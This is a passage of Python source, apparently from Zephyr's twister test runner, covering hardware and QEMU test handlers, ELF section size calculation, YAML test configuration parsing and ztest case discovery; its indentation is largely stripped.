proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.suite.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug("Using serial device {} @ {} baud".format(serial_device, hardware.serial_baud))
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--snr")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
elif runner == "stm32cubeprogrammer":
command.append("--tool-opt=sn=%s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=hardware.serial_baud,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
out_state = "flash_error"
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state in ["timeout", "flash_error"]:
self.add_missing_testscases(harness)
if out_state == "timeout":
self.instance.reason = "Timeout"
elif out_state == "flash_error":
self.instance.reason = "Flash error"
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.results = harness.tests
# Sometimes a test instance fails to execute and leaves an empty
# results dictionary; fill the results with BLOCK so the instance is
# still included in the final report.
if self.instance.results == {}:
for k in self.instance.testcase.cases:
self.instance.results[k] = 'BLOCK'
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this because once QEMU starts, it runs forever until killed.
Test cases emit special messages to the console as they run; we check
for these to determine whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process execution time to approximate the time of the guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering; we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
# There's a possibility that we polled nothing because
# the host did not schedule enough CPU time to the
# QEMU process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
if harness.is_pytest:
harness.handle(None)
out_state = harness.state
break
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
if harness.is_pytest:
harness.pytest_run(logfile)
out_state = harness.state
handler.record(harness)
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# Sometimes QEMU can't handle the SIGTERM signal correctly;
# in that case, kill the QEMU process directly (kill -9) and leave
# twister to judge the test result from the console output
is_timeout = True
self.terminate(proc)
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join(0)
if self.thread.is_alive():
logger.debug("Timed out while monitoring QEMU output")
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
self.add_missing_testscases(harness)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP cannot be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in an ad hoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
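# Minimal sketch (illustration only): how get_test() applies valid_keys to a
# hypothetical test entry whose yaml section contains only `tags: kernel posix`.
# Assumes `parser` is a TwisterConfigParser that has already been load()ed.
def _config_parser_demo(parser):
    valid_keys = {
        "timeout": {"type": "int", "default": 60},
        "tags": {"type": "set"},
        "extra_args": {"type": "list"},
    }
    # Returns {"timeout": 60, "tags": {"kernel", "posix"}, "extra_args": []}
    return parser.get_test("sample.case", valid_keys)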
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class ScanPathResult:
"""Result of the TestCase.scan_path function call.
Attributes:
matches A list of test cases
warnings A string containing one or more
warnings to display
has_registered_test_suites Whether or not the path contained any
calls to the ztest_register_test_suite
macro.
has_run_registered_test_suites Whether or not the path contained at
least one call to
ztest_run_registered_test_suites.
has_test_main Whether or not the path contains a
definition of test_main(void)
"""
def __init__(self,
matches: List[str] = None,
warnings: str = None,
has_registered_test_suites: bool = False,
has_run_registered_test_suites: bool = False,
has_test_main: bool = False):
self.matches = matches
self.warnings = warnings
self.has_registered_test_suites = has_registered_test_suites
self.has_run_registered_test_suites = has_run_registered_test_suites
self.has_test_main = has_test_main
def __eq__(self, other):
if not isinstance(other, ScanPathResult):
return False
return (sorted(self.matches) == sorted(other.matches) and
self.warnings == other.warnings and
(self.has_registered_test_suites ==
other.has_registered_test_suites) and
(self.has_run_registered_test_suites ==
other.has_run_registered_test_suites) and
self.has_test_main == other.has_test_main)
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponding to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
registered_suite_regex = re.compile(
br"^\s*ztest_register_test_suite"
br"\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
# Checks if the file contains a definition of "void test_main(void)"
# Since ztest provides a plain test_main implementation it is OK to:
# 1. register test suites and not call the run function iff the test
# doesn't have a custom test_main.
# 2. register test suites and a custom test_main definition iff the test
# also calls ztest_run_registered_test_suites.
test_main_regex = re.compile(
br"^\s*void\s+test_main\(void\)",
re.MULTILINE)
stc_regex = re.compile(
br"""^\s* # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
# ztest_register_test_suite(n, p, ztest_user_unit_test(TESTNAME),
(?:ztest_
(?:test_suite\(|register_test_suite\([a-zA-Z0-9_]+\s*,\s*)
[a-zA-Z0-9_]+\s*,\s*
)?
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?
# Consume the argument that becomes the extra testcase
\(\s*(?P<stc_name>[a-zA-Z0-9_]+)
# _setup_teardown() variant has two extra arguments that we ignore
(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?
\s*\)""",
# We don't check how it finishes; we don't care
re.MULTILINE | re.VERBOSE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
registered_suite_run_regex = re.compile(
br"^\s*ztest_run_registered_test_suites\("
br"(\*+|&)?(?P<state_identifier>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
registered_suite_regex_match = registered_suite_regex.search(
main_c)
if registered_suite_regex_match:
has_registered_test_suites = True
if registered_suite_run_regex.search(main_c):
has_run_registered_test_suites = True
if test_main_regex.search(main_c):
has_test_main = True
if not suite_regex_match and not has_registered_test_suites:
# Can't find ztest_test_suite; this may just be a client of ztest
# that includes ztest.h
return ScanPathResult(
matches=None,
warnings=None,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main)
suite_run_match = suite_run_regex.search(main_c)
if suite_regex_match and not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
if suite_regex_match:
search_start = suite_regex_match.end()
else:
search_start = registered_suite_regex_match.end()
if suite_run_match:
search_end = suite_run_match.start()
else:
search_end = re.compile(br"\);", re.MULTILINE) \
.search(main_c, search_start) \
.end()
achtung_matches = re.findall(
achtung_regex,
main_c[search_start:search_end])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[search_start:search_end])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "", 1) for match in _matches]
return ScanPathResult(
matches=matches,
warnings=warnings,
has_registered_test_suites=has_registered_test_suites,
has_run_registered_test_suites=has_run_registered_test_suites,
has_test_main=has_test_main)
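    # Example (illustration only): for a source file containing
    #     ztest_test_suite(common, ztest_unit_test(test_sleep));
    #     ztest_run_test_suite(common);
    # scan_file() reports matches == ["sleep"]; each discovered case has its
    # leading "test_" prefix stripped before being recorded.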
def scan_path(self, path):
subcases = []
has_registered_test_suites = False
has_run_registered_test_suites = False
has_test_main = False
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
raise TwisterRuntimeError(
"%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
if result.has_registered_test_suites:
has_registered_test_suites = True
if result.has_run_registered_test_suites:
has_run_registered_test_suites = True
if result.has_test_main:
has_test_main = True
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
result: ScanPathResult = self.scan_file(filename)
if result.warnings:
logger.error("%s: %s" % (filename, result.warnings))
if result.matches:
subcases += result.matches
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
if (has_registered_test_suites and has_test_main and
not has_run_registered_test_suites):
warning = \
"Found call to 'ztest_register_test_suite()' but no "\
"call to 'ztest_run_registered_test_suites()'"
logger.error(warning)
raise TwisterRuntimeError(warning)
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest', 'pytest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# Right now we only support building on Windows; running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
